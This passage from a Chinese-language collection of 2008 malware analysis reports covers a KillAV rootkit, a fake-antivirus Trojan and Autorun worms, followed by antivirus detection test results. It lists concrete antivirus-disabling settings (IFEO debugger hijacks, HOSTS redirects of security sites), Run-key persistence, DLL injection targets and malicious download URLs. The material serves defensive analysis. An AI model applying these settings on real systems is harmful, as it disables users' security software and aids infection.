Execution Options\lamapp.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown2000.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOOKOUT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luall.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LUCOMSERVER.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image 
File Execution Options\mcafee.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoft.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mon.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moniker.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MOOLIVE.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFTRAY.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ms.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N32ACAN.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapw32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVLU32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVNT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navrunr.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSCHED.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navwnt.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisum.exe * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution Options\360safe.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ACKWIN32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anti.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivir.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atrack.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUTODOWN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCONSOL.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVE32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGCTRL.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avk.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKSERV.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] o Debugger = "svchost.exe" * 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPUPD.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVSCHED32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avsynmgr.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWIN95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxonsol.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKD.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKICE.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIADMIN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIAUDIT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIND.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\CLAW95CT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER3.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DAVPFW.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbg.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\debu.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95_O.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ECENGINE.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EFINET32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESAFE.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESPWATCH.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorewclass.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-AGNT95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution Options\F-PROT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-prot95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-stopw.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FINDVIRU.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fir.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fp-win.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRW.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMSERV.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMASN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMAVSP.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ice.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOAD95.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOADNT.exe] o Debugger = "svchost.exe" * 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICMOON.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSSUPPNT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iom.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iomon98.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JED.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kabackreport.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kasmain.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kav32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavstart.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kissvc.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kpfwsvc.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPPMain.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRF.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\KVMonXP.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVPreScan.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kwatch.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lamapp.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown2000.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOOKOUT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luall.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LUCOMSERVER.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcafee.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoft.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mon.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moniker.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MOOLIVE.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFTRAY.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ms.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution Options\N32ACAN.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapw32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVLU32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVNT.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navrunr.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSCHED.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW32.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navwnt.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe] o Debugger = "svchost.exe" * [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisum.exe] o Debugger = "svchost.exe" 備註: HOSTS 文件修改: 127.0.0.1 www.360.cn 127.0.0.1 www.360safe.cn 127.0.0.1 www.360safe.com 127.0.0.1 www.chinakv.com 127.0.0.1 www.rising.com.cn 127.0.0.1 rising.com.cn 127.0.0.1 dl.jiangmin.com 127.0.0.1 jiangmin.com 127.0.0.1 www.jiangmin.com 127.0.0.1 www.duba.net 127.0.0.1 www.eset.com.cn 127.0.0.1 www.nod32.com 127.0.0.1 shadu.duba.net 127.0.0.1 union.kingsoft.com 127.0.0.1 www.kaspersky.com.cn 127.0.0.1 
kaspersky.com.cn 127.0.0.1 virustotal.com 127.0.0.1 www.kaspersky.com 127.0.0.1 www.cnnod32.cn 127.0.0.1 www.lanniao.org 127.0.0.1 www.nod32club.com 127.0.0.1 www.dswlab.com 127.0.0.1 bbs.sucop.com 127.0.0.1 www.virustotal.com 127.0.0.1 tool.ikaka.com 建立連線: l11.6600.org 下載網頁: http://www.web179.cn/ad/count.asp?mac=00-00-00-00-00-00&os=Win XP&ver=2.5.1202&temp=242656&key=261380 使用了傳統技術的 IFEO 來阻止防毒軟體執行,並透過 DLL 注入的方式,隱藏樣 本執行的痕跡 還加載多個驅動程式,是一個 rootkit 級的 KillAV 回到第一頁 WinDefender2009.exe 的分析報告 一般資訊 分析日期 可執行 : 檔案類型 上傳者 : 分析者 : : : 2008-12-10 是 : EXE kitman231 integear 樣本骨幹圖 : WinDefender2009.exe └ k.txt └qmgr0.dat └qmgr1.dat └WinDefender 2009.lnk └WinDefender 2009.lnk └uninstall.exe └vb.ini └windef.exe └WinDefender.s1 └WinDefender.s2 └WinDefender.s3 └winnt.bmp WinDefender2009.exe 的行為分析 : 建立檔案 : WinDefender2009.exe //母體 C :\Windows\k.txt C :\Documents and Settings\All Users\Application Data\qmgr0.dat C :\Documents and Settings\All Users\Application Data\qmgr1.dat C :\Documents and Settings\[UserName]\Desktop\WinDefender 2009.lnk // 捷徑,無害 C :\Documents and Settings\[UserName]\Start Menu\Programs\WinDefender 2009.lnk //捷徑,無害 C :\Program File\suninstall.exe C :\Program File\vb.ini C :\Program File\windef.exe //主要生成物 C :\Program File\WinDefender.s1 C :\Program File\WinDefender.s2 C :\Program File\WinDefender.s3 C :\Program File\winnt.bmp 建立新的處理程序 : WinDefender2009.exe //母體 windef.exe //主要生成物 建立新的服務 : BITS(狀態:執行) 建立新的登錄檔 : [HKEY_CURRENT_USER\Software\WinDefender2009] * Path = "%ProgramFiles%\WinDefender" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ThemeMan ager] * SystemID = 0x00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] * WinDefender2009 = "%ProgramFiles%\WinDefender\windef.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninsta ll\WinDefender 2009] * UninstallString = "%ProgramFiles%\WinDefender\Uninstall.exe" * InstallLocation = "%ProgramFiles%\WinDefender" * DisplayName = "WinDefender 2009" * DisplayIcon = 
"%ProgramFiles%\WinDefender\windef.exe,0" * * * * DisplayVersion = "3.4" VersionMajor = 0x00000002 VersionMinor = 0x00000002 NoModify = 0x00000001 * NoRepair = 0x00000001 下載檔案 : http://09021030408721.cn/cfg1. php 分析結果 : 病毒類型 : Trojan-FakeAlert 病毒檔案名:Trojan2008.12.24@009 回到第一頁 樣本名:Cu.exe 類型:Worm-Autorun 病毒檔案名:Worm2008.12.24@001 上傳者:mizuhara 分析者:asusp4b533 分析日期:20081206 分析工具:ThreatExpert 可執行:是 建立檔案: c:\autorun.inf %Temp%\tmp3.tmp %Temp%\tmp5.tmp %Temp%\WER4848.dir00\appcompat.txt %Temp%\WER4848.dir00\manifest.txt %Temp%\WER4848.dir00\spoolsv.exe.hdmp %Temp%\WER4848.dir00\spoolsv.exe.mdmp %Programs%\homeview\Uninstall.lnk %ProgramFiles%\homeview\Uninstall.exe c:\resycled\boot.com %Windir%\Temp\tmp6.tmp 程序及記憶體行為: 執行檔案: %Temp%\jah32223.exe c:\resycled\boot.com DLL 遠端注入: %System%\dll.dll->%System%\spoolsv.exe 登錄檔建立行為: o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview\CLSID o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Uninstall\homeview o HKEY_CURRENT_USER\Software\homeview o HKEY_CURRENT_USER\Software\{NSINAME} o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*] + DocumentInfo = 0x00000047 + GlobalTip = 0x00000CD1 + AutoTip = "rfx???|?{`" + Reserved = 0x6B02F719 o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\homeview\CLSID] + (Default) = "{6BF52A52-394A-11D3-B153-00C04F79FAA6}" o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \Uninstall\homeview] + UninstallString = ""%ProgramFiles%\homeview\Uninstall.exe"" + InstallLocation = "%ProgramFiles%\homeview" + DisplayName = "homeview" + DisplayIcon = "%ProgramFiles%\homeview\Uninstall.exe,0" o [HKEY_CURRENT_USER\Software\homeview] + (Default) = "%ProgramFiles%\homeview" o [HKEY_CURRENT_USER\Software\{NSINAME}] + Start Menu Folder = "homeview" 登錄檔修改行為: * [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent] o (Default) = 0x0000000C * [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurr ent] o (Default) = 0x0000000C 備註: 建立連線: 
    94.247.2.107:80 (possible backdoor)

Sample name: k08aww.exe
Type: Worm-Autorun
Sample file name: Worm2008.12.24@003
Uploaded by: mizuhara
Analysed by: asusp4b533
Analysis date: 20081206
Analysis tool: ThreatExpert
Executable: Yes
Files created:
  c:\autorun.inf
  %Temp%\9f.dll
  c:\k08aww.bat
  %System%\kavo.exe
  %System%\kavo0.dll
  %System%\kavo1.dll
Process and memory behaviour:
  Files executed:
    %System%\kavo.exe
    k08aww.exe
  Remote memory allocation:
    created in -> %Windir%\explorer.exe
  Remote DLL injection:
    %System%\kavo0.dll -> %Windir%\explorer.exe
Registry keys and values created:
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    kava = "%System%\kavo.exe"
Registry values modified:
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
    CheckedValue = 0x00000000
Notes:
  Downloaded file: http://www.1a123.com/jj/cc.rar -> %Temp%\cc.rar
  Standard Kxvo behaviour.

Sample name: Setup_trnovirfrech_c.exe
Type: Virus-All
Sample file name: Virus2008.12.24@001
Uploaded by: kitman231
Analysed by: asusp4b533
Analysis date: 20081206
Analysis tool: ThreatExpert
Executable: Yes
Files created:
  %Temp%\.tt1.tmp
  %Temp%\.tt6B.tmp
  %Temp%\.tt1.tmp.vbs
  %System%\blphc35dj0erc1.scr
  %System%\lphc35dj0erc1.exe
  %System%\phc35dj0erc1.bmp
  %System%\Restore\MachineGuid.txt
Process and memory behaviour:
  Files executed:
    %System%\lphc35dj0erc1.exe
    blphc35dj0erc1.scr
  Remote memory allocation:
    created in -> %System%\svchost.exe
  Service modified:
    service name -> System Restore Service
    service -> %System%\svchost.exe -k netsvcs
    status -> Running
Registry keys and values created:
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
  HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host
  HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
  HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen Saver
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    lphc35dj0erc1 = "%System%\lphc35dj0erc1.exe" (so that lphc35dj0erc1.exe runs every time Windows starts)
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier]
    InstallID = "a4d60ab5-6f2e-4270-8461-df8594e006ee"
  [HKEY_CURRENT_USER\Control Panel\Desktop]
    ConvertedWallpaper = "%System%\phc35dj0erc1.bmp"
    SCRNSAVE.EXE = "%System%\blphc35dj0erc1.scr"
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    NoDispBackgroundPage = 0x00000001
    NoDispScrSavPage = 0x00000001
  [HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen Saver]
    EulaAccepted = 0x00000001
Registry values modified:
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
    DisableSR = 0x00000000
  [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    AppData = "%Profiles%\NetworkService\Application Data"
    Cache = "%Profiles%\NetworkService\Local Settings\Temporary Internet Files"
  [HKEY_CURRENT_USER\Control Panel\Colors]
    Background = "0 0 255"
  [HKEY_CURRENT_USER\Control Panel\Desktop]
    ScreenSaveActive = "1"
    Wallpaper = "%System%\phc35dj0erc1.bmp"
    WallpaperStyle = "0"
    OriginalWallpaper = "%System%\phc35dj0erc1.bmp"
Notes:
  Web pages fetched:
    http://windowsupdate.microsoft.com
    localhost
    http://avxp-2008.net/images/1224467073/9d1f0e1489a543dec127d3af79e71e0f/a4d60ab5-6f2e-4270-8461-df8594e006ee.gif
  Suspected to be a combined threat: it installs a backdoor and specifically sabotages the screen display, installing a simulated screen saver that makes the user believe a BSOD has occurred.

A-Squared Anti-Malware 4.0
Antivirus version: 4.0.0.67
Signature database: 2,477,867
Heuristics setting: none
Test environment: Windows XP SP3
Other: manual scan setting: delete manually after detection
Count shown by the antivirus: 19/19
Actual file count: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files: none
Files detected but not removed: none
Files detected but could only be quarantined: none
Tester: JusticeH

Avira Antivir Personal
Version: 8.2.0.337
Engine: 8.02.00.45
Signature database: 7.01.01.37
Heuristics: fully off
Test environment: Windows Vista Home Premium SP1 x86
Other: manual scan with automatic handling: repair on detection, delete if repair is not possible
Count shown by the antivirus: 20/25
Actual file count: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files (objects inside archives): none
Detected but not removed: none
Detected and quarantined: none
Tester: megakotaro

費爾托斯特 (Filseclab) V7R3
Version: 7.3.1.23211
Engine: 8.02.00.45
Signature database: 9.20.32419
Heuristics: default heuristics (general mode)
Test environment: Windows XP SP3 x86
Other: manual scan + manual deletion
Count shown by the antivirus: 8/19
Actual file count: 19
Files removed: 8
Files remaining: 11
Not detected: 11
Detection rate: 8/19 = 42.1%
Removal rate: 8/19 = 42.1%
Remaining files (objects inside archives):
  Backdoor2008.12.24@003.gz
  Backdoor2008.12.24@003.zip
  Trojan2008.12.24@001.gz
  Trojan2008.12.24@003.zip
  Trojan2008.12.24@005.zip
  Trojan2008.12.24@008.gz
